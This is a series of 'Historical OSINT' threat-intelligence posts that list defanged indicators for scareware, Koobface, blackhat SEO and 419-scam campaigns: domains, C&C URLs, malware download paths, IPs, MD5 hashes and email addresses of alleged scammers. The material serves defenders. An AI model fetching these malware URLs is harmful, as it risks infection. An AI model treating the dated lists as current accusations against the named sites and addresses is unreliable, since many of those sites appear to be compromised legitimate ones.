hxxp://ddterboiugsr.10fast.net

hxxp://jgpewnoiihpq.10fast.net

hxxp://kjfpfseeeqo.007gb.com

hxxp://wubcmciuuya.007gb.com

hxxp://quzkxvooift.007gb.coml

hxxp://nblhlheaaum.007gb.com

hxxp://cclxnciuupq.007gb.com

hxxp://nbhkckueeib.007gb.com

hxxp://hgddxliuudp.007gb.com

hxxp://winilhueuwiz.10fast.net

hxxp://queocliuupqv.10fast.net

hxxp://gdtaqboiihhs.10fast.net

hxxp://bbvovbaaancg.10fast.net

hxxp://fpramvoiiftm.10fast.net

hxxp://fjliljiiizhp.10fast.net

hxxp://gspedpeeeiel.10fast.net

Sample malicious domains known to have participated in the campaign:

hxxp://fssukjaoanbx.5nxs.com

hxxp://ptaawviuuppw.5nxs.com

hxxp://llxozkoiikdq.5nxs.com

hxxp://kkkijguuuquz.5nxs.com

hxxp://womobciiiftn.5nxs.com
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hxxp://vvcikgueequl.5nxs.com

hxxp://zzzoxcooozzl.5nxs.com

hxxp://wuuocziuupwn.5nxs.com

hxxp://hfyeqnoiiftm.5nxs.com

hxxp://sttewboookgy.5nxs.com

hxxp://ghhusteaozgt.5nxs.com

hxxp://fjzoqtuuukiw.5nxs.com

hxxp://muuaqciueomz.5nxs.com

hxxp://fsfugduuutav.5nxs.com

hxxp://jgdeywaoocks.5nxs.com

hxxp://raniljuuurix.5nxs.com

hxxp://pabikhueamcg.5nxs.com

hxxp://gsteqbooikdr.5nxs.com

hxxp://llhugfuuerab.5nxs.com

hxxp://dspeyyeeeauv.5nxs.com

hxxp://xzkixhuaoczg.5nxs.com

hxxp://rouawmaaammz.5nxs.com

hxxp://kxlijjiuuspt.5nxs.com

hxxp://xzliljiuifyw.5nxs.com

hxxp://vvvilhiueqac.5nxs.com

hxxp://tovikhiiufdt.5nxs.com

hxxp://ttretreeuhgs.5nxs.com

Sample malicious domains known to have participated in the campaign:

hxxp://ypserreeuytq.5nxs.com

hxxp://xxzijkiiikkf.5nxs.com

hxxp://bvzoknaoigpm.5nxs.com

hxxp://nnxihduuutqv.5nxs.com

hxxp://muzidyeeeevh.5nxs.com

hxxp://tpdufhiiidrn.5nxs.com

hxxp://ffpupteeeaqd.5nxs.com

hxxp://bbxigseeolpm.5nxs.com

hxxp://gsdugpeaeibj.5nxs.com

hxxp://pwteyyeaamcg.5nxs.com

hxxp://zxcoljiiigpw.5nxs.com

hxxp://bmacxoiixjs.5nxs.com

hxxp://twqawmaooczf.5nxs.com

hxxp://bbrartuauhjh.5nxs.com

hxxp://dtiolhueeexd.5nxs.com

Sample malicious domains known to have participated in the campaign:

hxxp://gdduhgiiikhd.5nxs.com

hxxp://ryquhfuuuypr.5nxs.com

hxxp://sfhijkiuusrn.5nxs.com

hxxp://staennaoolgy.5nxs.com

hxxp://vvvoczooolzg.5nxs.com

hxxp://bmnokgueequz.5nxs.com

hxxp://proocxoiigds.5nxs.com

hxxp://ptwepwaoozht.5nxs.com

hxxp://fsdufpeeeovg.5nxs.com
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hxxp://dtlidwoiuyoz.5nxs.com

hxxp://kvyamboiuhsr.5nxs.com

hxxp://kvmardioetyp.5nxs.com

hxxp://taniljueuwul.5nxs.com

hxxp://jvnartuuixvx.5nxs.com

hxxp://qubijgiuutac.5nxs.com

Sample malicious domains known to have participated in the campaigns:

hxxp://qebocziuidfy.10fast.net

hxxp://gffudpeeeauc.10fast.net

hxxp://vbjustaiurox.10fast.net

hxxp://jgyuptaoutic.10fast.net

hxxp://lkhighueeevk.10fast.net

hxxp://ptpudreeeobz.10fast.net

hxxp://meeambaooxls.10fast.net

hxxp://yrreyraaovld.10fast.net

hxxp://kkdutwaoobzd.10fast.net

hxxp://czxitbouuquz.10fast.net

hxxp://lvbovnaoozjp.10fast.net

hxxp://wiiambaookdt.10fast.net

hxxp://zxkijgueaecg.10fast.net

hxxp://ywqawqaoovzh.10fast.net

hxxp://gzoukwuuizbv.10fast.net

hxxp://roiabcoiigpq.10fast.net

hxxp://vvlufseaavld.10fast.net

hxxp://hgpusyeaamxg.10fast.net

hxxp://kkkikziiifyq.10fast.net

hxxp://dtqaczoiuswb.10fast.net

hxxp://llzozxoiigpw.10fast.net

hxxp://nmcijkiuuobg.10fast.net

hxxp://mnxijliuusrm.10fast.net

hxxp://quuanbooikfy.10fast.net

hxxp://xxzijhuueuex.10fast.net

hxxp://gsyepyeaaubk.10fast.net

hxxp://tqoaqmaoigsr.10fast.net

hxxp://cvbocziiikgp.10fast.net

hxxp://gdyepteaancj.10fast.net

Sample malicious domains known to have participated in the campaign:

hxxp://qibocziuewuz.10fast.net

hxxp://qrkargoaatsf.10fast.net

hxxp://zzdeymaoifyq.10fast.net

hxxp://noeancoiutac.10fast.net

hxxp://qunovnaaammb.10fast.net

hxxp://gffugdeeeibk.10fast.net

hxxp://cmvijsueenls.10fast.net

hxxp://tqaeryeaanxj.10fast.net

hxxp://xmuambiiifyt.10fast.net

hxxp://cvnanneeesff.10fast.net

hxxp://muuaqbooolfy.10fast.net
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hxxp://qimacvaaetyr.10fast.net

hxxp://vxfutqaoihsw.10fast.net

hxxp://ywreyruuuhhg.10fast.net

hxxp://fdteyteeeoel.10fast.net

hxxp://ywianvoiupwc.10fast.net

hxxp://zlgeyraoobls.10fast.net

hxxp://zkhujdeaojpm.10fast.net

hxxp://kjfufduuutqm.10fast.net

hxxp://xxjudpueewiz.10fast.net

hxxp://rooewmeaamcg.10fast.net

hxxp://hffugdueeink.10fast.net

hxxp://xmcoxzoiikkd.10fast.net

hxxp://lllizkuiifyq.10fast.net

hxxp://xmuapsuiovnb.10fast.net

hxxp://tquanvoiuyqv.10fast.net

hxxp://kvnartuuujlk.10fast.net

hxxp://lllikhioozjf.10fast.net

hxxp://yrreypeeamck.10fast.net

hxxp://glhihfueaeck.10fast.net

Sample malicious domains known to have participate in the campaign:

hxxp://goadult.info/go.php?sid=13 -> -> hxxp://goadult.info/go.php?sid=9 - &gt -> hxxp://r2606.com/go/?pid=30937

-> which is a well known Koobface 1.0 command and control server domain.

Related malicious redirectors known to have participated in the campaign:

hxxp://goadult.info - 78.109.28.16 - tech@goadult.info

hxxp://go1go.net - 174.36.214.32 - tech@go1go.net

hxxp://wpills.info - 174.36.214.3 - Email: tech@wpills.info
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HIstorical OSINT - Latvian ISPs, Scareware, and the Koobface Gang Connection (2018-10-20 22:34)

It’s 2010 and we’ve recently stumbled upon yet another malicious and fraudulent campaign courtesy of the Koobface

gang actively serving fake security software also known as scareware to a variety of users with the majority of

malicious software conveniently parked within 79.135.152.101 - AS2588, LatnetServiss-AS LATNET ISP successfully

hosting a diverse portfolio of fake security software.

In this post, I’ll provide actionable intelligence on the infrastructure behind the campaign and discuss in-depth

the tactics techniques and procedures of the cybercriminals behind it.

Sample malware known to have participated in the campaign:

installer.1.exe - MD5: 4ab2cb0dd839df64ec8d682f904827ef - Trojan.Crypt.ZPACK.Gen; Mal/FakeAV-CQ - Result: 9/40

(22.50 %)

Related malicious phone back C &C server IPs:

hxxp://av-plusonline.org/install/avplus.dll

hxxp://av-plusonline.org/cb/real.php?id=

Related malicious MD5s known to have participated in the campaign:

avplus.dll - MD5: 57c79fb723fcbf4d65f4cd44e00ff3ed - FakeAlert-LF; Mal/FakeAV-CL - Result: 6/39 (15.39 %)

It’s gets even more interesting as hxxp://fast-payments.com - 91.188.59.27 is parked within Koobface bot-

net’s 1.0 phone back locations (hxxp://urodinam.net) and is also hosted within the same netblock at 91.188.59.10.

Sample related malicious URLs known to have participated in the campaign:

hxxp://urodinam.net/33t.php?stime=125558

- hxxp://91.188.59.10/opa.exe -MD5: d4aacc8d01487285be564cbd3a4abc76 - Downloader.VB.7.S; Mal/Koobface-B -

Result: 10/40 (25 %)

Once executed a sample malware phones back to the following malicious C &C server IPs:

hxxp://aburvalg.com/new1.php - 64.27.0.237

- hxxp://fucking-tube.net

The following domains use it as a name server:

hxxp://ns1.addedantivirus.com

Related malicius domains known to have responded to the same malicious name server:

hxxp://antiviralpluss.org

hxxp://antivirspluss.org

hxxp://avonlinescanerr.org

hxxp://online-scannerr.org

hxxp://onlinescanerr.org

hxxp://onlinescannerr.org

hxxp://pretection-page.org

hxxp://sys-mesage.org

hxxp://av-plus-online.org

hxxp://av-plusonline.org
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hxxp://avplus-online.org

hxxp://avplusonline.org

hxxp://avplussonline.org

hxxp://protecmesages.org

hxxp://protect-mesagess.org

hxxp://protectmesages.org

hxxp://protectmesagess.org

hxxp://protectmessages.org

hxxp://avplus24support.com

hxxp://searchwebway4.com

hxxp://searchwebway5.com

hxxp://searchwebway10.com

hxxp://searchwebway9.com

hxxp://searchwebway6.com

Related malicious URLs known to have participated in the campaign:

hxxp://avplus-online.org/buy.php?id=

- hxxp://fast-payments.com/index.php?prodid=antivirplus _02 _01 &afid=

Related malicious domains known to have participated in the campaign:

hxxp://antiviruspluss.org

hxxp://avplusscanner.org

hxxp://protection-messag.org

hxxp://antivirs-pluss.org

hxxp://antiviru-pluss.org

hxxp://antivirus-p1uss.org

hxxp://protection-mesage.org

hxxp://sysstem-mesage.org

hxxp://system-message.org

hxxp://antiviral-pluss.org

hxxp://av-onlinescanner.org

hxxp://avonlinescanner.org

hxxp://avonlinescannerr.org

hxxp://avp-scanner.org

hxxp://avp-scannerr.org

hxxp://avp-sscaner.org

hxxp://avp-sscannerr.org

hxxp://avplscaner-online.org

hxxp://avplscanerr-online.org

hxxp://avplsscannerr.org

hxxp://avplus-scanerr.org

hxxp://online-protection.org

hxxp://antivirupluss.org

hxxp://syssmessage.org

hxxp://avonlinescanerr.org

hxxp://online-scannerr.org

hxxp://onlinescanerr.org

hxxp://onlinescannerr.org
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hxxp://av-scanally.org

hxxp://av-scaner-online.org

hxxp://av-scaner-online3k.org

hxxp://av-scaner-onlineband.org

hxxp://av-scaner-onlinebody.org

hxxp://av-scaner-onlinebuzz.org

hxxp://av-scaner-onlinecabin.org

hxxp://av-scaner-onlinecrest.org

hxxp://av-scaner-onlinefolk.org

hxxp://av-scaner-onlineplan.org

hxxp://av-scaner-onlinesite.org

hxxp://iav-scaner-online.org

hxxp://netav-scaner-online.org

hxxp://techav-scaner-online.org

hxxp://antivirspluss.org

hxxp://sys-mesage.org

hxxp://antiviralpluss.org

hxxp://pretection-page.org

hxxp://av-scaner-onlinefairy.org

hxxp://av-scaner-onlinegrinder.org

hxxp://av-scaner-onlinehistory.org

hxxp://av-scaner-onlineicity.org

hxxp://av-scaner-onlinemachine.org

hxxp://av-scaner-onlinepeople.org

hxxp://av-scaner-onlineretort.org

hxxp://av-scaner-onlinereview.org

hxxp://av-scaner-onlinetopia.org

hxxp://directav-scaner-online.org

hxxp://expertav-scaner-online.org

hxxp://orderav-scaner-online.org

hxxp://speedyav-scaner-online.org

hxxp://thriftyav-scaner-online.org

hxxp://timesav-scaner-online.org

hxxp://411online-scanner-free.org

hxxp://dynaonline-scanner-free.org

hxxp://fastonline-scanner-free.org

hxxp://homeonline-scanner-free.org

hxxp://online-scanner-freebin.org

hxxp://online-scanner-freebuy.org

hxxp://online-scanner-freelook.org

hxxp://online-scanner-freemap.org

hxxp://online-scanner-freemeet.org

hxxp://online-scanner-freesite.org

hxxp://online-scanner-freetent.org

hxxp://online-scanner-freeu.org

hxxp://online-scanner-freevolt.org

hxxp://onlinescannerfree.org

hxxp://av-plus-online.org

hxxp://protecmesages.org

hxxp://av-onlicity.org
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hxxp://av-online-scanner.org

hxxp://av-online-scannerbid.org

hxxp://av-online-scannercrest.org

hxxp://av-online-scannerfolk.org

hxxp://av-online-scannergate.org

hxxp://av-online-scannerland.org

hxxp://av-online-scannerpc.org

hxxp://av-online-scannersite.org

hxxp://av-online-scannerweek.org

hxxp://av-online-scannerwing.org

hxxp://infoav-online-scanner.org

hxxp://shopav-online-scanner.org

hxxp://theav-online-scanners.org

hxxp://avplus-online.org

hxxp://protectmesages.org

hxxp://av-scaner.org

hxxp://av-scaners.org

hxxp://av-scanner.org

hxxp://av-scanners.org

hxxp://avplussonline.org

hxxp://avscaner.org

hxxp://avscaners.org

hxxp://avscanner.org

hxxp://avscanners.org

hxxp://eav-scaner.org

hxxp://eav-scaners.org

hxxp://eav-scanner.org

hxxp://eav-scanners.org

hxxp://myav-scaner.org

hxxp://myav-scaners.org

hxxp://myav-scanner.org

hxxp://myav-scanners.org

hxxp://protectmessages.org

hxxp://avplusonline.org

hxxp://av-plusonline.org

hxxp://protect-mesagess.org

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Massive Scareware Dropping Campaign Spotted in the Wild (2018-10-20 22:38)

It’s 2008 and I’ve recently spotted a currently circulating malicious and fraudulent scareware-serving malicious

domain portfolio which I’ll expose in this post with the idea to share actionable threat intelligence with the security

community further exposing and undermining the cybercrime ecosystem the way we know it potentially empowering

security researchers and third-party vendors with the necessary data to stay ahead of current and emerging threats.

Related malicious domains known to have participated in the campaign:

hxxp://50virus-scanner.com

hxxp://700virus-scanner.com

hxxp://antivirus-test66.com

hxxp://antivirus200scanner.com

hxxp://antivirus600scanner.com

hxxp://antivirus800scanner.com

hxxp://antivirus900scanner.com

hxxp://av-scanner200.com

hxxp://av-scanner300.com

hxxp://av-scanner400.com

hxxp://av-scanner500.com

hxxp://inetproscan031.com

hxxp://internet-scan020.com

hxxp://novirus-scan00.com

hxxp://stopvirus-scan11.com

hxxp://stopvirus-scan13.com

hxxp://stopvirus-scan16.com

hxxp://stopvirus-scan33.com

hxxp://virus66scanner.com

hxxp://virus77scanner.com

hxxp://virus88scanner.com

hxxp://antivirus-scan200.com

hxxp://antispy-scan200.com

hxxp://av-scanner200.com

hxxp://av-scanner300.com

hxxp://antivirus-scan400.com

hxxp://antispy-scan400.com

hxxp://av-scanner400.com

hxxp://av-scanner500.com

hxxp://antivirus-scan600.com

hxxp://antispy-scan600.com

hxxp://antivirus-scan700.com

hxxp://antispy-scan700.com

hxxp://av-scanner700.com

hxxp://antispy-scan800.com

hxxp://antivirus-scan900.com

hxxp://novirus-scan00.com

hxxp://stop-virus-010.com

hxxp://spywarescan010.com

hxxp://antispywarehelp010.com

hxxp://internet-scan020.com

hxxp://internet-scanner020.com
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hxxp://insight-scan20.com

hxxp://internet-scanner030.com

hxxp://stop-virus-040.com

hxxp://internet-scan040.com

hxxp://insight-scan40.com

hxxp://internet-scan050.com

hxxp://internet-scanner050.com

hxxp://insight-scan60.com

hxxp://stop-virus-070.com

hxxp://internet-scan070.com

hxxp://internet-scanner070.com

hxxp://insight-scan80.com

hxxp://stop-virus-090.com

hxxp://internet-scan090.com

hxxp://internet-scanner090.com

hxxp://insight-scan90.com

hxxp://antispywarehelpk0.com

hxxp://inetproscan001.com

hxxp://novirus-scan01.com

hxxp://spyware-stop01.com

hxxp://antivirus-inet01.com

hxxp://stopvirus-scan11.com

hxxp://inetproscan031.com

hxxp://novirus-scan31.com

hxxp://antivirus-inet31.com

hxxp://novirus-scan41.com

hxxp://antivirus-inet41.com

hxxp://antivirus-inet51.com

hxxp://inetproscan061.com

hxxp://novirus-scan61.com

hxxp://inetproscan081.com

hxxp://novirus-scan81.com

hxxp://inetproscan091.com

hxxp://spyware-stopb1.com

hxxp://spyware-stopm1.com

hxxp://spyware-stopn1.com

hxxp://spyware-stopz1.com

hxxp://antispywarehelp002.com

hxxp://antispywarehelp022.com

hxxp://novirus-scan22.com

hxxp://antispywarehelpk2.com

hxxp://insight-scanner2.com

hxxp://spywarescan013.com

hxxp://stopvirus-scan13.com

hxxp://novirus-scan33.com

hxxp://stopvirus-scan33.com

hxxp://antispywarehelp004.com

hxxp://antispywarehelpk4.com

hxxp://spywarescan015.com

hxxp://novirus-scan55.com
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hxxp://insight-scanner5.com

hxxp://stopvirus-scan16.com

hxxp://stopvirus-scan66.com

hxxp://antispywarehelpk6.com

hxxp://spywarescan017.com

hxxp://insight-scanner7.com

hxxp://antispywarehelp008.com

hxxp://spywarescan018.com

hxxp://stopvirus-scan18.com

hxxp://novirus-scan88.com

hxxp://stopvirus-scan88.com

hxxp://antivirus-test88.com

hxxp://antispywarehelpk8.com

hxxp://insight-scanner8.com

hxxp://insight-scanner9.com

hxxp://10scanantispyware.com

hxxp://20scanantispyware.com

hxxp://30scanantispyware.com

hxxp://60scanantispyware.com

hxxp://80scanantispyware.com

hxxp://2scanantispyware.com

hxxp://3scanantispyware.com

hxxp://5scanantispyware.com

hxxp://7scanantispyware.com

hxxp://8scanantispyware.com

hxxp://spyware200scan.com

hxxp://spyware500scan.com

hxxp://spyware800scan.com

hxxp://spyware880scan.com

hxxp://50virus-scanner.com

hxxp://90virus-scanner.com

hxxp://antivirus900scanner.com





hxxp://antivirus10scanner.com

hxxp://virus77scanner.com

hxxp://virus88scanner.com

hxxp://net001antivirus.com

hxxp://net011antivirus.com

hxxp://net111antivirus.com

hxxp://net021antivirus.com

hxxp://net-02antivirus.com

hxxp://net222antivirus.com

hxxp://net-04antivirus.com

hxxp://net-05antivirus.com

hxxp://net-07antivirus.com

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Malware Domains Impersonating Google (2018-10-20 22:51)

It”s 2008 and I’ve recently stumbled upon a currently active typosquatted portfolio of malware-serving domains suc-

cessfully impersonating Google further spreading malicious software to hundreds of thousands of unsuspecting users.

In this post I’ll provide actionable intelligence on the infrastructure behind the campaign.

Related malicious domains known to have participated in the campaign:

hxxp://google-analyse.com/in.cgi?default

hxxp://google-analystic.com/in.cgi

hxxp://google-analysis.com/cgi-bin/nsp15/in.cgi?p=in

hxxp://google-analystic.net

hxxp://google-counter.com/cgi-bin/nsp1?p=in

hxxp://googlerank.info/counter/

hxxp://googlehlp.com

hxxp://pagead2.googlesynidication.com

hxxp://service-google.cn

hxxp://1.ie-google.cn

hxxp://analystic.cn/in.cgi?default

hxxp://255-google-video.info

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 22:35)

It’s 2008 and I recently came across to a pretty decent portfolio of rogue and fraudulent malicious scareware-serving

domains successfully acquiring traffic through a variety of black hat SEO techniques in this particular case the airplane

crash of the Polish president.

Related malicious domains known to have participated in the campaign:

hxxp://sarahscandies.com

hxxp://armadasur.com

hxxp://gayribisi.com

hxxp://composerjohnbeal.com

hxxp://preferredtempsinc.com

hxxp://ojaivalleyboys.com

hxxp://homelinkmag.com

hxxp://worldwidestones.com

hxxp://silsilaqasmia.com

hxxp://vidoemo.com

hxxp://channhu.com

hxxp://ideasenfoco.com

Related malicious domains known to have participated in the campaign:

hxxp://homeownersmoneysaver.com

hxxp://preferredtempsinc.com

hxxp://sarahscandies.com

hxxp://channhu.com

hxxp://intheclub.com

hxxp://internetcabinetsdirect.com

hxxp://silentservers.com

hxxp://ojaivalleyboys.com

Related malicious domains known to have participated in the campaign:

hxxp://indigo-post.com

hxxp://jacksonareadiscgolf.com

Related malicious domains known to have participated in the campaign:

hxxp://werodink.com

hxxp://jingyi-plastic.com

hxxp://impressionsphotographs.com

Sample URL redirection chain:

hxxp://cooldesigns4u.co.uk/sifr.php

- hxxp://visittds.com/su/in.cgi?2 - 213.163.89.55 - Email: johnvernet@gmail.com

- hxxp://scaner24.org/?affid=184 - 91.212.127.19 - Email: bobarter@xhotmail.net

Redirectors parked on 213.163.89.55 (AS49544, INTERACTIVE3D-AS Interactive3D) include:

hxxp://google-analyze.org

hxxp://alioanka.com
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hxxp://robokasa.com

hxxp://thekapita.com

hxxp://rbomce.com

hxxp://kolkoman.com

hxxp://nikiten.com

hxxp://rokobon.com

hxxp://odile-marco.com

hxxp://ramualdo.com

hxxp://omiardo.com

hxxp://nsfer.com

hxxp://racotas.com

hxxp://foxtris.com

hxxp://mongoit.com

hxxp://mangasit.com

hxxp://convart.com

hxxp://baidustatz.com

hxxp://google-analyze.cn

hxxp://statanalyze.cn

hxxp://reycross.cn

hxxp://m-analytics.net

hxxp://yahoo-analytics.net

We’ve already seen hxxp://google-analyze.org and hxxp://yahoo-analytics.net in several related [1]mass com-

promise of related Embassy Web Sites.

We’ll continue monitoring the campaign and post updates as new developments take place.

1. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html
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Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild - Part Two (2018-10-21 22:47)

It’s 2008 and I’ve recently came across to a massive black hat SEO campaign successfully enticing users into falling

victim into fraudulent and malicious scareware-serving campaign. In this post I’ll provide actionable intelligence on

the infrastructure behind it.

Related malicious domains and redirectors known to have participated in the campaign:

hxxp://msh-co.com

hxxp://incubatedesign.com

hxxp://incubatedesign.com

hxxp://lancemissionart.com

hxxp://audioboxstudios.com

hxxp://hwhitecustomhomes.com

hxxp://indobestroof.com

hxxp://in-prague.com

hxxp://hvmpglobalconsulting.com

hxxp://indierthanthou.com

hxxp://huckleberryroad.com

hxxp://indiepoprockhop.com

hxxp://indianfriends.org

hxxp://hwhitecustomhomes.com

hxxp://husuzem.com

hxxp://husuzem.com

hxxp://seankobuk.com

hxxp://in-led.net

hxxp://pellaiowahomes.com

hxxp://i-leadzsite.com

hxxp://seankobuk.com

hxxp://i4z.com

hxxp://in-prague.com

hxxp://tmnttoys.com

hxxp://hulshizer.com

hxxp://audioboxstudios.com

hxxp://msh-co.com

hxxp://i-leadzsite.com

hxxp://hulshizer.com

hxxp://msh-co.com

hxxp://indierthanthou.com

hxxp://neighborhoodnursingcare.com

hxxp://i4004.net

hxxp://ndiepoprockhop.com

hxxp://pugzor.net

hxxp://indiepoprockhop.com

hxxp://in-turkey.info

hxxp://hwhitecustomhomes.com

hxxp://salsaspice.com

hxxp://calidogrocks.com

hxxp://incubatedesign.com

hxxp://iac-tokyo.org

hxxp://huckleberryroad.com
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hxxp://in-prague.com

hxxp://hulshizer.com

hxxp://neighborhoodnursingcare.com

hxxp://indigo.earthman.ca

hxxp://backyardcreations.org

hxxp://uraband.com

hxxp://huckleberryroad.com

hxxp://indobestroof.com

hxxp://indiepoprockhop.com

hxxp://iac-tokyo.org

hxxp://indiansexhq.com

hxxp://calidogrocks.com

hxxp://the-flooring-connection.com

hxxp://pugzor.net

hxxp://the-flooring-connection.com

hxxp://in-prague.com

hxxp://iac-tokyo.org

hxxp://humordehoy.com

hxxp://msh-co.com

hxxp://pellaiowahomes.com

hxxp://salsaspice.com

hxxp://lancemissionart.com

hxxp://incubatedesign.com

hxxp://iac-tokyo.org

hxxp://tmnttoys.com

hxxp://in-prague.com

hxxp://backyardcreations.org

hxxp://the-flooring-connection.com

hxxp://sasm.net

hxxp://indefenseof.com

hxxp://uraband.com

hxxp://i-need-a-websitedesigned.com

hxxp://hwhitecustomhomes.com

hxxp://scottiesautobody.com

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Rogue Scareware Dropping Campaign Spotted in the Wild Courtesy of the Koobface

Gang (2018-10-21 23:02)

It’s 2010 and I’ve recently came across to a diverse portfolio of fake security software also known as scareware

courtesy of the Koobface gang in what appears to be a [1]direct connection between the gang’s activities and the

Russian Business Network.

In this post I’ll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics

techniques and procedures of the cybercriminals behind including the direction establishment of a direct connection

between the gang’s activities and a well-known Russian Business Network customer.

Related malicious domains known to have participated in the campaign:

hxxp://piremover.eu/hitin.php?affid=02979 - 212.117.161.142; 95.211.27.154; 95.211.27.166

Once executed a sample malware (MD5: eedac4719229a499b3118f87f32fae35) phones back to the follow-

ing malicious C &C server IPs:

hxxp://xmiueftbmemblatlwsrj.cn/get.php?id=02979 - 91.207.116.44 - Email: robertsimonkroon@gmail.com

Known domains known to have responded to the same malicious C &C server IPs:

hxxp://aahsdvsynrrmwnbmpklb.cn

hxxp://dlukhonqzidfpphkbjpb.cn

hxxp://barykcpveiwsgexkitsg.cn

hxxp://bfichgfqjqrtkwrsegoj.cn

hxxp://dhbomnljzgiardzlzvkp.cn

Once executed a sample malware phones back to the following malicious C &C service IPs:

hxxp://xmiueftbmemblatlwsrj.cn

hxxp://urodinam.net - which is a [2]well known [3]Koobface 1.0 C &C server domain IP also seen in the "[4]Mass DreamHost Sites Compromise" exclusively profiled in this post.

hxxp://xmiueftbmemblatlwsrj.cn

Once

executed

a

sample

malware

MD5:

66dc85ad06e4595588395b2300762660;

MD5:

91944c3ae4a64c478bfba94e9e05b4c5 phones back to the following malicious C &C server IPs:

hxxp://proxim.ntkrnlpa.info - 83.68.16.30 - seen and observed in related analysis regarding the [5]mass Embassy

Web site compromise throughout 2007 and 2009.

Successfully dropping the following malicious Koobface MD5 hxxp://harmonyhudospa.se/.sys/?getexe=fb.70.exe

Related malicious MD5s (MD known to have participated in the campaign:

MD5: 66dc85ad06e4595588395b2300762660

MD5: 8282ea8e92f40ee13ab716daf2430145

Once executed a sample malware phones back to the following malicious C &C server IPs:

hxxp://tehnocentr.chita.ru/.sys

hxxp://gvpschekschov.iv-edu.ru/.sys/?action=fbgen

We’ll continue monitoring the campaign and post updates as soon as new developments take place.

1. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html

2. https://draft.blogger.com/
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3. https://ddanchev.blogspot.com/2010/05/koobface-gang-responds-to-10-things-you.html

4. https://ddanchev.blogspot.com/2010/05/dissecting-mass-dreamhost-sites.html

5. https://ddanchev.blogspot.com/2017/05/historical-osint-inside-2007-2009.html
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Historical OSINT - Profiling a Portfolio of Active 419-Themed Scams (2018-10-21 23:08)

It’s 2010 and I’ve recently decided to provide actionable intelligence on a variety of 419-themed scams in particular

the actual malicious actors behind the campaigns with the idea to empower law enforcement and the community

with the necessary data to track down and prosecute the malicious actors behind these campaigns.

Related malicious and fraudulent emails known to have participated in the campaign:

david _ikemba@supereme-loan-finance.com - 96.24.14.4

charles.maynard1@gmx.com - 218.31.134.111

mr.karimahmed2004@msn.com - 41.203.231.82

fedexdelivryservices@yahoo.com.hk - 89.187.142.72

chevrondisbursement@hotmail.com - 41.138.182.245

mrslindahilldesk00000@hotmail.co.uk - 41.138.188.45

natt.westt@live.com - 115.242.40.142

google11anniversary2010@live.com - 115.240.21.112

barjamessmith@qatar.io - 115.242.94.153

delata _ecobank@web2mail.com - 202.58.64.18

junhuan9@yahoo.cn - 68.190.243.51

fairlandindustryltd@mail.ru - 41.138.190.213

shkhougal@aol.com - 80.35.222.9

jamestimeswel@rogers.com - 203.170.192.4

alimubarakhm@hotmail.com - 115.134.5.245

godwinemefiele2010@hotmail.com - 41.211.229.65

skyebankplclagosnigera@gmail.com, skyebankplclagosnigera@zapak.com - 41.138.178.241

contact.alcchmb@sify.com - 116.206.153.50

officelottery94@yahoo.com.hk - 124.122.145.226

kadamluk@live.com - 41.217.65.14

garycarsonuk@w.cn - 220.225.213.221

stella _willson48@yahoo.co.uk - 82.196.5.120

trustlink@w.cn - 87.118.82.8

george201009@hotmail.com - 59.120.137.197

drmannsurmuhtarrr _155@yahoo.cn, mrstreasurecollinnsss@gmail.com - 82.114.78.222
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Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild (2018-10-21 23:21)

It’s 2010 and I’ve recently stumbled upon yet another diverse portfolio of blackhat SEO domains this time serving

rogue security software also known as scareware to unsuspecting users with the cybercriminals behind the campaign

successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts largely relying

on the utilization of an affiliate-network based type of revenue sharing scheme.

In this post I’ll profile the infrastructure behind the campaign and provide actionable intelligence on the in-

frastructure behind it.

Related malicious domains known to have participated in the campaign:

hxxp://arnalduatis.com

hxxp://batistaluciano.com

hxxp://bethemedia.net

hxxp://bride-beautiful.com

hxxp://burgessandsons.com

hxxp://carolinacane.com

hxxp://caulfieldband.com

hxxp://improvenewark.com

hxxp://marsmellow.info

hxxp://noodlesonline.com

hxxp://queenslumber.com

hxxp://thesolidwoodflooringcompany.com

hxxp://wirelessexpertise.com

hxxp://bigbangexpress.com

hxxp://bioresonantie.net

hxxp://clubipg.com

hxxp://djdior.com

hxxp://djektoyz.com

hxxp://getraenkepool.com

hxxp://hartmanpescar.com

hxxp://hetkaashuis.com

hxxp://menno.info

hxxp://pianoaccompanistcompetition.com

hxxp://soundwitness.org

hxxp:/strijkvrij.com
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Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware (2018-10-21 23:37)

It’s 2010 and I’ve recently intercepted a currently active malicious and fraudulent blakchat SEO campaign success-

fully enticing users into interacting with rogue and fraudulent scareware-serving malicious and fraudulent campaigns.

In this post I’ll profile the infrastructure behind the campaign and provide actionable intelligence on the in-

frastructure behind it.

Sample URL redirection chain:

hxxp://noticexsummary.com/re.php?lnk=1203597664 - 87.255.55.231

- hxxp://new-pdf-reader.com/1/promo/index.asp?aff=11677 - 66.207.172.196

= hxxps://secure-signupway.com/promo/join.aspx?siteid=3388

Related malicious domains known to have participated in the campaign:

hxxp://noticexsummary.com/

Related malicious domains known to have participated in the campaign:

hxxp://online-tv-on-your-pc.com/p2/index.asp?aff=11680 &camp=unsub

We’ll continue monitoring the campaign and post updates as soon as new developments take place.
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Historical OSINT - Yet Another Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware

(2018-10-21 23:47)

It’s 2010 and I’ve recently came across to a currently active malicious and fraudulent blackhat SEO campaign success-

fully enticing users into interacting with rogue and fraudulent scareware-serving malicious and fraudulent campaigns.

In this post I’ll provide actionable intelligence on the infrastructure behind the campaign.

Related malicious domains known to have participated in the campaign:

hxxp://globals-advers.com

hxxp://alldiskscheck300.com

hxxp://multisearch1.com

hxxp://myfreespace3.com

hxxp://hottystars.com

hxxp://multilang1.com

hxxp://3gigabytes.com

hxxp://drivemedirect.com

hxxp://globala2.com

hxxp://teledisons.com

hxxp://theworldnews5.com

hxxp://virtualblog5.com

hxxp://grander5.com

hxxp://5starsblog.com

hxxp://globalreds.com

hxxp://global-advers.com

